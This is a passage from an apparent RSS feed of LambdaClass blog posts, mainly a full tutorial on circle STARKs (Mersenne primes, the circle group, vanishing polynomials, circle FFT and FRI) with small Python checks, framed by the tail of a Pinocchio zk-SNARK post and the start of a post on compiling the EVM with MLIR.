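v = [5, 7, 11]              # some witness polynomial v(x)
delta = 42                  # random mask sampled by the prover

# v(x) + delta * t(x), coefficient-wise
masked = [(a + delta * b) % P for a, b in zip(v, t)]

for root in (1, 2):
    assert poly_eval(masked, root) == poly_eval(v, root)
assert masked != v  # but the polynomial itself changed
```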
&lt;p&gt;You can see the zero-knowledge adaptation of the protocol in detail in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;abs&#x2F;1906.07221&quot;&gt;Chapter 4.13&lt;&#x2F;a&gt; of &lt;em&gt;Why and How zk-SNARK Works&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;7-summary&quot;&gt;7. Summary&lt;&#x2F;h2&gt;
&lt;p&gt;In this post we covered the main ideas behind Pinocchio’s protocol and our implementation using the Lambdaworks library. We first saw the steps to transform code into a QAP. Then, we presented the actual protocol, explaining how it works and why we need each different check to achieve security. Finally, we observed that while its primary objective is to achieve verifiable computation, it can incorporate zero-knowledge properties with minimal additional effort.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>An introduction to circle STARKs</title>
          <pubDate>Thu, 25 Jul 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/an-introduction-to-circle-starks/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/an-introduction-to-circle-starks/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/an-introduction-to-circle-starks/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Scalable, transparent arguments of knowledge (STARKs) have gained widespread attention due to their applications in verifiable computing and blockchain scalability. We can use STARKs to generate a short string that attests to the integrity of a computation, and a verifier can check it very fast. Generating a STARK proof consists of the following steps:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Represent the computation as a system of polynomial constraints&#x2F;equations. This could be the Algebraic Intermediate Representation (AIR) or Plonkish arithmetization. We will use AIR for the remainder of the post.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Obtain the execution trace for the program.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Interpret each column of the execution trace as the evaluations of a univariate polynomial over some smooth domain $D$ (this step is called interpolation).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Evaluate the trace polynomials over a larger and disjoint domain $D_0$ and build a Merkle tree using the evaluations.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Enforce the constraints on the trace polynomials.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. To ensure that the constraints are satisfied, divide each polynomial in step 5 by the vanishing polynomial on the set where the constraints hold. The constraints are fulfilled if the result of the division is a polynomial.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. If there are many polynomials, get random values from the verifier to perform a linear combination; with high probability the constraints hold if the result is a polynomial.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    8. Evaluate the resulting function over $D_0$ and build a Merkle tree from those evaluations.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    9. To show that the evaluations belong to a polynomial of at most degree $n$ (and not a higher degree or rational function), apply the [FRI protocol](&#x2F;how-to-code-fri-from-scratch&#x2F;).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The efficiency of STARKs depends on working over smooth fields, where we can use the radix-2 Cooley-Tukey Fast Fourier Transform (FFT) to perform fast interpolation and evaluation. We say that the field is smooth if $p - 1 = 2^m c$, where $m$ is sufficiently large and $c$ is an odd number. Examples of fields having this property are STARK-252, $2^{64} - 2^{32} + 1$ (sometimes called Mini-Goldilocks or oxfoi prime), $2^{31} - 2^{27} + 1$ (Baby Bear).&lt;&#x2F;p&gt;
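To see these smoothness claims concretely, here is a quick sketch that computes the 2-adicity $m$ and odd part $c$ of $p - 1$ for two of the fields mentioned above:

```python
# Sketch: compute p - 1 = 2^m * c (c odd) for two STARK-friendly primes.
def two_adicity(n):
    """Return (m, c) with n = 2^m * c and c odd."""
    m = 0
    while n % 2 == 0:
        n //= 2
        m += 1
    return m, n

goldilocks = 2**64 - 2**32 + 1   # Mini-Goldilocks
baby_bear = 2**31 - 2**27 + 1    # Baby Bear

assert two_adicity(goldilocks - 1) == (32, 2**32 - 1)  # m = 32
assert two_adicity(baby_bear - 1) == (27, 15)          # m = 27
```

Both fields contain large power-of-two multiplicative subgroups, which is exactly what the radix-2 Cooley-Tukey FFT needs.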
&lt;p&gt;One of the main advantages of STARKs is that we can work over “small fields” (their size is smaller than needed for cryptographic security), reducing the overhead needed to represent variables in the execution trace&#x2F;virtual machine. We can then sample randomness from an extension field to achieve cryptographic security. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1784&quot;&gt;Binius&lt;&#x2F;a&gt; shows how we can represent variables with zero overhead using binary fields.&lt;&#x2F;p&gt;
&lt;p&gt;In this post we will provide an explanation of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2024&#x2F;278.pdf&quot;&gt;Circle STARKs&lt;&#x2F;a&gt;, how we can use the circle group to access very fast modular arithmetic and why we need certain properties to be able to perform STARKs over the circle group. To do so, we need to develop the circle analogues of classical STARKs: bivariate polynomials, smooth domains, circle codes, vanishing polynomials, FFT and FRI. While many things seem quite close to their classical analogues, there are some subtleties that arise and special limits or points where we should be careful. If you want to see how these primitives are implemented, you can check &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stwo&#x2F;tree&#x2F;dev&quot;&gt;Starkware’s prover Stwo&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;Plonky3&#x2F;Plonky3&#x2F;tree&#x2F;main&#x2F;circle&#x2F;src&quot;&gt;Polygon’s Plonky3&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ethereum&#x2F;research&#x2F;tree&#x2F;master&#x2F;circlestark&quot;&gt;Vitalik’s python implementation&lt;&#x2F;a&gt;. If you need a recap on classical STARKs, see &lt;a href=&quot;&#x2F;diving-deep-fri&#x2F;&quot;&gt;post 1&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;how-to-code-fri-from-scratch&#x2F;&quot;&gt;post 2&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;mersenne-primes&quot;&gt;Mersenne primes&lt;&#x2F;h2&gt;
&lt;p&gt;Mersenne primes have the form $2^p - 1$, where $p$ is prime ($2^p - 1$ is not always prime for every prime $p$). They have nice reduction formulae (since $2^p \equiv 1 \pmod{2^p - 1}$) and lead to very fast modular arithmetic (which in turn is crucial to performance in STARKs). Some Mersenne primes are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $2^2 -1 = 3$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $2^3 - 1 = 7$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $2^5 - 1 = 31$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $2^7 - 1 = 127$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $2^{31} - 1 = 2147483647$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $2^{61} - 1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $2^{127} - 1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
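The reduction formula can be sketched directly: since $2^{31} \equiv 1 \pmod{2^{31} - 1}$, the high bits of a number can be folded onto the low bits with a shift and a mask, replacing division entirely.

```python
# Sketch of Mersenne reduction for p = 2^31 - 1: fold high bits onto low bits.
P31 = (1 << 31) - 1

def mersenne_reduce(n):
    """Reduce a non-negative integer mod 2^31 - 1 using shifts, masks and adds."""
    while n >> 31:
        n = (n & P31) + (n >> 31)  # fold: high * 2^31 contributes high * 1
    return 0 if n == P31 else n

for n in [0, 1, P31 - 1, P31, P31 + 5, 2**31, 12345678901234567890]:
    assert mersenne_reduce(n) == n % P31
```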
&lt;p&gt;The problem with using Mersenne primes with STARKs is that $p - 1 = 2c$, where $c$ is odd, meaning that they are not smooth. This way, we cannot perform interpolation efficiently using the FFT. A way to circumvent this is to have the interpolation domain live in a quadratic extension of a Mersenne prime, as explained &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;824.pdf&quot;&gt;here&lt;&#x2F;a&gt;. However, this approach is not well suited for constraint evaluations (quotient computations), limiting performance for traces frequently encountered in zkvms.&lt;&#x2F;p&gt;
&lt;p&gt;These shortcomings can be avoided by switching to the circle curve $x^2 + y^2 = 1$ over the field given by the Mersenne prime $q$. The circle, equipped with the operation inherited from the rotation group over the field, is a cyclic group. Moreover, its number of elements is equal to $q + 1$. For a Mersenne prime, this means that $q + 1 = 2^p$.&lt;&#x2F;p&gt;
&lt;p&gt;Mersenne primes also satisfy $q \equiv 3 \pmod {4}$, which implies that $x^2 + 1$ is irreducible over $F_q$. We will have $i$ satisfy $i^2 = -1$ and work with extensions $F$ of $F_q$. To keep with the notation of the paper, $F(i)$ is a quadratic extension of the base field $F$.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;polynomials&quot;&gt;Polynomials&lt;&#x2F;h2&gt;
&lt;p&gt;We will denote $F[x]^d$ the univariate polynomials of degree at most $d$ and $F[x,y]^d$ the bivariate polynomials of degree at most $d$. For example, $x + 2x^5 + x^{34}$ is in $F_q [x]^{36}$ but $x^{56} + 1$ is not. Similarly, $1 + x y^2 + x^{34} + y^{35} + x^{12} y^{12}$ is in $F_q [x,y]^{64}$ but not $x^{32} y^{34} + x^{12} + 25$.&lt;&#x2F;p&gt;
&lt;p&gt;In circle STARKs, we will work with bivariate polynomials modulo $x^2 + y^2 - 1$. Since $y^2 = 1 - x^2$, we can always express a polynomial in $F[x,y]^d$ as&lt;br &#x2F;&gt;
$f(x,y) = f_0 (x) + y f_1 (x)$&lt;br &#x2F;&gt;
which we call the canonical representation of the polynomial. As an example, say we have the polynomial&lt;br &#x2F;&gt;
$p(x,y) = x + 4 y^3 + 5 x^2 y^5 + x y^6$&lt;br &#x2F;&gt;
We can replace $y^2 = 1 - x^2$ and get&lt;br &#x2F;&gt;
$p(x,y) = x + 4 y (1 - x^2) + 5x^2 y (1 - x^2)^2 + x (1 - x^2)^3$&lt;br &#x2F;&gt;
From this, we get that&lt;br &#x2F;&gt;
$f_0 (x) = x + x (1 - x^2)^3$&lt;br &#x2F;&gt;
$f_1 (x) = 4 (1 - x^2) + 5x^2 (1 - x^2)^2$&lt;&#x2F;p&gt;
&lt;p&gt;This decomposition is useful to compute the circle FFT and FRI. Something nice about $f_0 (x)$ and $f_1 (x)$ is that they are both univariate, which will lead to additional simplicity and performance for the subsequent steps (the only thing we need to be careful about is the structure of the squaring map for $x$. Instead of having $x \rightarrow x^2$ we have $x \rightarrow 2x^2 - 1$).&lt;&#x2F;p&gt;
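The reduction to canonical form can be sketched mechanically (toy field $F_{31}$, illustrative helper names): substitute $y^2 = 1 - x^2$ term by term and collect the parts that are even and odd in $y$, then verify the identity on every point of the circle.

```python
# Sketch: reduce a bivariate polynomial modulo y^2 = 1 - x^2 into the
# canonical form f0(x) + y * f1(x), over the toy field F_31.
from math import comb

P = 31  # toy Mersenne prime 2^5 - 1

def decompose(terms):
    """terms: dict (i, j) -> coeff for the monomial x^i y^j.
    Returns univariate f0, f1 (dicts x-degree -> coeff) with
    p(x, y) = f0(x) + y * f1(x) on the circle."""
    f0, f1 = {}, {}
    for (i, j), c in terms.items():
        k, rem = divmod(j, 2)          # y^j = (1 - x^2)^k * y^rem
        target = f1 if rem else f0
        for t in range(k + 1):         # binomial expansion of (1 - x^2)^k
            coeff = c * comb(k, t) * (-1) ** t
            target[i + 2 * t] = (target.get(i + 2 * t, 0) + coeff) % P
    return f0, f1

def ev1(poly, x):
    return sum(c * pow(x, d, P) for d, c in poly.items()) % P

def ev2(terms, x, y):
    return sum(c * pow(x, i, P) * pow(y, j, P) for (i, j), c in terms.items()) % P

# p(x, y) = x + 4 y^3 + 5 x^2 y^5 + x y^6, the example from the text
p = {(1, 0): 1, (0, 3): 4, (2, 5): 5, (1, 6): 1}
f0, f1 = decompose(p)

# the identity p(x, y) = f0(x) + y * f1(x) holds on every circle point
for x in range(P):
    for y in range(P):
        if (x * x + y * y) % P == 1:
            assert ev2(p, x, y) == (ev1(f0, x) + y * ev1(f1, x)) % P
```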
&lt;h2 id=&quot;the-circle-group&quot;&gt;The circle group&lt;&#x2F;h2&gt;
&lt;p&gt;Circle points are pairs $(x_0 , y_0)$ (with coordinates in the field $F$) satisfying the equation $x_0^2 + y_0^2 = 1$. We can induce a group structure by considering the following operation,&lt;br &#x2F;&gt;
$(x_0 , y_0 ) \cdot (x_1 , y_1 ) = (x_0 x_1 - y_0 y_1 , x_0 y_1 + x_1 y_0 )$&lt;br &#x2F;&gt;
If we fix $P = (P_x , P_y)$ we can define the rotation by $P$, $T_P (x , y) = (x P_x - y P_y , x P_y + y P_x )$. This operation is important when we need to evaluate transition constraints. For example, if we want to check that we are computing a Fibonacci sequence, we need to show that $a_{n + 2} = a_{n + 1} + a_{n}$. If we have the trace polynomial $t(x)$, we can get the element following $x$ just by multiplying by $\omega$, the generator of the interpolation domain, and have the Fibonacci constraint be $t(\omega^2 x) = t(\omega x) + t(x)$. If we choose $P$ as the generator of the (circle) interpolation domain, we can use the same idea to write these constraints.&lt;&#x2F;p&gt;
&lt;p&gt;Inverses can be calculated straightforwardly: if $P = (x , y)$, then $-P = (x, -y)$.&lt;&#x2F;p&gt;
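A quick sketch over the toy field $F_{31}$ verifying these facts: the circle has $q + 1 = 32$ points, the group law is the one above, $(x, -y)$ inverts $(x, y)$, and the group is cyclic.

```python
# Sketch: the circle group over the toy Mersenne prime 31.
P = 2**5 - 1  # 31

# enumerate all circle points x^2 + y^2 = 1 over F_31
points = [(x, y) for x in range(P) for y in range(P)
          if (x * x + y * y) % P == 1]
assert len(points) == P + 1  # the circle group has q + 1 = 32 elements

def mul(a, b):
    """Circle group law (x0, y0) * (x1, y1)."""
    (x0, y0), (x1, y1) = a, b
    return ((x0 * x1 - y0 * y1) % P, (x0 * y1 + x1 * y0) % P)

# the identity is (1, 0) and the inverse of (x, y) is (x, -y)
for pt in points:
    assert mul(pt, (pt[0], (-pt[1]) % P)) == (1, 0)

def order(g):
    acc, n = g, 1
    while acc != (1, 0):
        acc, n = mul(acc, g), n + 1
    return n

# the group is cyclic: some point has order exactly 32
assert any(order(pt) == P + 1 for pt in points)
```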
&lt;p&gt;An important map is the square mapping, $\pi (x,y) = (x^2 - y^2 , 2xy) = (2x^2 - 1, 2xy)$. We can see that the first component depends only on $x$. The square map produces a two-to-one reduction when acting over subgroups or special cosets (called twin position cosets). Operations over the circle are implemented here in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stwo&#x2F;blob&#x2F;dev&#x2F;crates&#x2F;prover&#x2F;src&#x2F;core&#x2F;circle.rs&quot;&gt;Stwo&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;To learn more about the domains over the circle or types of cosets, see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;Plonky3&#x2F;Plonky3&#x2F;blob&#x2F;main&#x2F;circle&#x2F;src&#x2F;domain.rs&quot;&gt;Plonky3’s implementation&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;circle-codes&quot;&gt;Circle codes&lt;&#x2F;h2&gt;
&lt;p&gt;The circle code is obtained by evaluating a polynomial $f(x,y)$ over a proper subset $D$ of the circle group over $F_q$. It can be proven that there is a one-to-one correspondence with Reed-Solomon codes (basically, circle codes are Reed-Solomon codes).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;vanishing-polynomials&quot;&gt;Vanishing polynomials&lt;&#x2F;h2&gt;
&lt;p&gt;In classical STARKs, we need to compute the vanishing polynomials over a set to then produce quotients. We need to find what these vanishing polynomials will look like in circle STARKs. The interesting result is that vanishing polynomials will be univariate, $v(x)$. The vanishing polynomial of a domain of size $2^n$ can be computed efficiently with $n$ applications of the squaring map, each consisting of a squaring, a doubling and a subtraction by one, following the recursion $v_{k + 1} (x) = 2 v_k (x)^2 - 1$. The first vanishing polynomials are:&lt;br &#x2F;&gt;
$v_1 (x) = x$&lt;br &#x2F;&gt;
$v_2 (x) = 2x^2 - 1$&lt;br &#x2F;&gt;
$v_3 (x) = 2(2x^2 - 1)^2 - 1$&lt;br &#x2F;&gt;
$v_4 (x) = 2(2(2x^2 - 1)^2 - 1)^2 - 1$&lt;br &#x2F;&gt;
$v_5 (x) = 2(2(2(2x^2 - 1)^2 - 1)^2 - 1)^2 - 1$&lt;&#x2F;p&gt;
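A sketch over the toy field $F_{31}$: evaluating $v_n$ by iterating the squaring map $x \rightarrow 2x^2 - 1$ and checking that it vanishes on exactly $2^n$ of the 32 circle points (for the sizes where such a domain exists in this toy group).

```python
# Sketch: vanishing polynomials over the circle for the toy prime 31.
P = 2**5 - 1  # 31; the circle over F_31 has 32 points

def v(n, x):
    """Evaluate the vanishing polynomial of a size-2^n domain at x:
    v_1(x) = x, then n - 1 applications of the squaring map x -> 2x^2 - 1."""
    for _ in range(n - 1):
        x = (2 * x * x - 1) % P
    return x

circle = [(x, y) for x in range(P) for y in range(P)
          if (x * x + y * y) % P == 1]
assert len(circle) == P + 1

# for each n up to 4, v_n vanishes on exactly 2^n of the 32 circle points
for n in range(1, 5):
    roots = [pt for pt in circle if v(n, pt[0]) == 0]
    assert len(roots) == 2**n
```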
&lt;p&gt;You can check how to evaluate the vanishing polynomials in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stwo&#x2F;blob&#x2F;be265626f064ac1fcc82b1bf13e28f83023a505a&#x2F;crates&#x2F;prover&#x2F;src&#x2F;core&#x2F;constraints.rs#L11-L34&quot;&gt;Stwo&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;As in the case of classical STARKs, if $v_H (x)$ and $v_J (x)$ are vanishing polynomials over the sets $H$ and $J$, the quotient $v_H (x) &#x2F; v_J (x)$ is a vanishing polynomial over $H \backslash J$. This way, we can compute efficiently constraints that apply over $H \backslash J$.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;circle-fft&quot;&gt;Circle FFT&lt;&#x2F;h2&gt;
&lt;p&gt;The inverse FFT takes a vector of evaluations and produces the coordinates of a polynomial over some basis. The FFT takes the coordinates over the basis and produces a set of evaluations. We are used to the monomial basis, $1, x, x^2 , x^3 , \dots, x^n$, but there are other options available. In the case of the circle FFT, the basis looks more complicated, but remember that what we want is just to encode values into polynomials and then evaluate them over a larger domain. For an FFT of size $2^n$, let $j_0 j_1 j_2 \dots j_{n - 1}$ be the binary decomposition of $0 \leq k \leq 2^n - 1$, that is, $k = j_0 + 2j_1 + 4j_2 + \dots + 2^{n - 1} j_{n - 1}$. The $k$-th basis polynomial is given by:&lt;br &#x2F;&gt;
$b_k (x , y) = y^{j_0} v_1 (x)^{j_1} v_2 (x)^{j_2} \dots v_{n - 1} (x)^{j_{ n - 1} }$&lt;br &#x2F;&gt;
To clarify the expression, here we have the first basis polynomials,&lt;br &#x2F;&gt;
$b_0 (x, y) = 1$&lt;br &#x2F;&gt;
$b_1 (x, y) = y$&lt;br &#x2F;&gt;
$b_2 (x, y) = v_1 (x) = x$&lt;br &#x2F;&gt;
$b_3 (x, y) = y v_1(x) = x y$&lt;br &#x2F;&gt;
$b_4 (x, y) = v_2 (x) = 2x^2 - 1$&lt;br &#x2F;&gt;
$b_5 (x, y) = y v_2 (x) = y( 2x^2 - 1)$&lt;br &#x2F;&gt;
$b_6 (x, y) = v_1 (x) v_2 (x) = x (2x^2 - 1)$&lt;&#x2F;p&gt;
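A sketch that evaluates the basis polynomials directly from the bits of $k$ (checked against a few of the small cases; `basis` and `v` are illustrative helper names):

```python
# Sketch: evaluate the k-th circle FFT basis polynomial from the bits of k,
# b_k = y^{j_0} * v_1(x)^{j_1} * v_2(x)^{j_2} * ...
P = 2**31 - 1  # Mersenne prime

def v(m, x):
    """v_1(x) = x, then m - 1 applications of the squaring map x -> 2x^2 - 1."""
    for _ in range(m - 1):
        x = (2 * x * x - 1) % P
    return x

def basis(k, x, y, nbits):
    """Evaluate b_k(x, y), with j_0 ... j_{nbits-1} the bits of k."""
    bits = [(k >> i) & 1 for i in range(nbits)]
    acc = y if bits[0] else 1
    for m in range(1, nbits):
        if bits[m]:
            acc = acc * v(m, x) % P
    return acc % P

x, y = 123, 456
assert basis(0, x, y, 3) == 1                              # b_0 = 1
assert basis(3, x, y, 3) == x * y % P                      # b_3 = y * v_1(x)
assert basis(5, x, y, 3) == y * ((2 * x * x - 1) % P) % P  # b_5 = y * v_2(x)
assert basis(6, x, y, 3) == x * ((2 * x * x - 1) % P) % P  # b_6 = v_1 * v_2
```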
&lt;p&gt;If we need to evaluate a polynomial of degree $n$ over $\beta n$ points ($\beta \geq 2$), we can zero-pad the polynomial with no problem.&lt;&#x2F;p&gt;
&lt;p&gt;In the first step of the FFT, we use the split of the canonical representation of the polynomial, $p(x, y) = f_0 (x) + y f_1 (x)$. The following steps deal with a univariate polynomial $f_j (x)$, where we can apply the even-odd decomposition, taking into account that the square mapping follows the circle operation. In other words,&lt;br &#x2F;&gt;
$f_{j,e} (2x^2 - 1) = (f_j (x) + f_j (- x))&#x2F;2$&lt;br &#x2F;&gt;
$f_{j,o} (2x^2 - 1) = (f_j (x) - f_j (- x))&#x2F;(2x)$&lt;&#x2F;p&gt;
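A quick numerical sketch of the even-odd split over $2^{31} - 1$ (arbitrary coefficients): by construction, recombining the two halves gives back $f_j(x) = f_{j,e}(2x^2 - 1) + x \, f_{j,o}(2x^2 - 1)$.

```python
# Sketch: verify the even-odd decomposition identity numerically mod 2^31 - 1.
P = 2**31 - 1

def ev(coeffs, x):
    """Horner evaluation of a polynomial mod P."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc

f = [3, 1, 4, 1, 5, 9, 2, 6]   # coefficients of some f(x)
inv2 = pow(2, P - 2, P)        # 1/2 mod P

for x in range(1, 100):
    fe = (ev(f, x) + ev(f, P - x)) * inv2 % P                         # f_e at 2x^2 - 1
    fo = (ev(f, x) - ev(f, P - x)) * inv2 % P * pow(x, P - 2, P) % P  # f_o at 2x^2 - 1
    assert (fe + x * fo) % P == ev(f, x)
```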
&lt;p&gt;We can continue breaking everything down until we can solve the FFT directly, using the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stwo&#x2F;blob&#x2F;dev&#x2F;crates&#x2F;prover&#x2F;src&#x2F;core&#x2F;fft.rs&quot;&gt;butterflies&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The twiddle factors for the first step are different from those used on the second.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;other-changes-in-circle-starks&quot;&gt;Other changes in circle STARKs&lt;&#x2F;h2&gt;
&lt;p&gt;When we impose the constraints on the trace polynomials and compute the quotients, we arrive at the composition polynomial. Its degree depends on the maximum degree of the constraints, and we may need to split it into several chunks. In the univariate case, we can do this decomposition as follows:&lt;br &#x2F;&gt;
$p(x) = p_0 (x) + x^{n + 1} p_1 (x) + x^{2n + 2} p_2 (x)$&lt;br &#x2F;&gt;
Each $p_k (x)$ has degree at most $n$. In circle STARKs, we decompose $p$ into functions $q_1 , q_2 , \dots , q_d$ and a parameter $\lambda$ such that&lt;br &#x2F;&gt;
$p = \lambda v_H (x) + \sum_k v_{ H } q_k &#x2F; v_{ H_k }$&lt;br &#x2F;&gt;
where the $H_k$ are disjoint twin cosets of size $n$ and their union yields $H$. The additional parameter $\lambda$ is needed because of the dimension gap discussed in the paper.&lt;&#x2F;p&gt;
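The univariate chunk decomposition can be sketched directly on coefficient lists (illustrative helper names): split the coefficients of $p(x)$ into blocks of $n + 1$, so each chunk $p_k$ has degree at most $n$ and $p(x) = \sum_k x^{k(n+1)} p_k(x)$.

```python
# Sketch: split a univariate polynomial into degree-at-most-n chunks so that
# p(x) = sum_k x^(k*(n+1)) * p_k(x).
def split(coeffs, n):
    step = n + 1
    return [coeffs[i:i + step] for i in range(0, len(coeffs), step)]

def ev(coeffs, x):
    acc = 0
    for c in reversed(coeffs):
        acc = acc * x + c
    return acc

p = [7, 0, 3, 1, 4, 1, 5]   # 7 + 3x^2 + x^3 + 4x^4 + x^5 + 5x^6
chunks = split(p, 1)        # chunks of degree at most 1

x = 5
assert ev(p, x) == sum(x ** (k * 2) * ev(c, x) for k, c in enumerate(chunks))
```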
&lt;p&gt;Circle FRI introduces some modifications with respect to classical FRI. First, we need to decompose the function to which we will apply FRI as $f = g + \lambda v_n (x)$. This decomposition is crucial to ensure that the function spaces halve at every folding step, reaching the space of constant functions at the end of the protocol. The folding follows a similar procedure to the one we encountered in the circle FFT; after the first folding, we have to deal with univariate functions and the square mapping $x \rightarrow 2x^2 - 1$.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Circle STARKs have shown &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;x.com&#x2F;StarkWareLtd&#x2F;status&#x2F;1807776563188162562&quot;&gt;amazing performance&lt;&#x2F;a&gt; by leveraging Mersenne primes, which have the fastest known finite field arithmetic. They work around the non-smooth multiplicative structure of fields defined over Mersenne primes by moving to the circle group, but closely follow their classical STARK analogues (albeit with some subtleties). Luckily, most of these subtleties are hidden from developers, and circle STARKs, together with efficient lookups (such as those based on LogUp and GKR), can help improve the performance of general-purpose zkvms.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>EVM performance boosts with MLIR</title>
          <pubDate>Fri, 14 Jun 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/evm-performance-boosts-with-mlir/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/evm-performance-boosts-with-mlir/</guid>
<description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/evm-performance-boosts-with-mlir/">&lt;p&gt;We implemented 75% of the functionality of the Ethereum Virtual Machine in two weeks, with five new hires, compiling the VM opcode logic to native machine code with a state-of-the-art compiler backend. Why did we do this? How?&lt;br &#x2F;&gt;
The TL;DR is: to get a performance boost (recent benchmark results show a throughput 300% to 600% higher than &lt;em&gt;revm&lt;&#x2F;em&gt;, when running factorial and fibonacci programs), to increase implementation diversity, and to use it in our upcoming implementation of an Ethereum Execution client.&lt;&#x2F;p&gt;
&lt;p&gt;Seeing as many other VMs compile bytecode to native instructions, it struck us as odd that Ethereum Virtual Machine (EVM) implementations don’t do the same. While building Cairo Native we &lt;a href=&quot;&#x2F;cairo-and-mlir&#x2F;&quot;&gt;learned a lot about MLIR&#x2F;LLVM&lt;&#x2F;a&gt;, so we started the EVM-MLIR project with the objective of having a faster alternative to &lt;em&gt;revm&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;We wanted to get a sense of feasibility as soon as possible, so we started by specifying the problem (and solution) well, laying out the project skeleton and utilities, and making sure the new team had a solid base to work on. With clear tasks ready to be assigned, we managed to implement 111 out of 149 opcodes from mainnet in two weeks!&lt;&#x2F;p&gt;
&lt;h2 id=&quot;applying-mlir-to-the-evm&quot;&gt;Applying MLIR to the EVM&lt;&#x2F;h2&gt;
